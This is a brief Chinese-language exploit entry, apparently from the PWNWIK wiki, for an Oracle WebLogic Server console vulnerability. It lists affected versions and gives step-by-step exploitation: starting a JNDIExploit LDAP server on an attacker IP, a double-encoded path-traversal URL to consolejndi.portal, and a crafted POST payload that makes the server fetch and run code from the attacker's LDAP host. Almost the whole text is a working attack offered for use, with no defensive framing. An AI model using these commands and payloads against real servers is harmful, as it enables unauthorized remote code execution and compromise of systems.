PWNWIK.COM
,
|
影响版本
Weblogic Server 10.3.6.0.0
Weblogic Server 12.1.3.0.0
Weblogic Server 12.2.1.3.0
Weblogic Server 12.2.1.4.0
Weblogic Server 14.1.1.0.0
漏洞利用
下载LDAP (LDAP需要Java1.8环境)。
java -jar JNDIExploit-v1.11.jar -i 192.168.1.123
首页URL后加入
/console/css/%252e%252e%252f/consolejndi.portal
在Burp中,将get修改为post,并且构造数据包。
注:192.168.1;123 有个点修改为分号。
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;123:1389/Basic/WeblogicEcho;AdminServer%22)
PWNWIK.COM
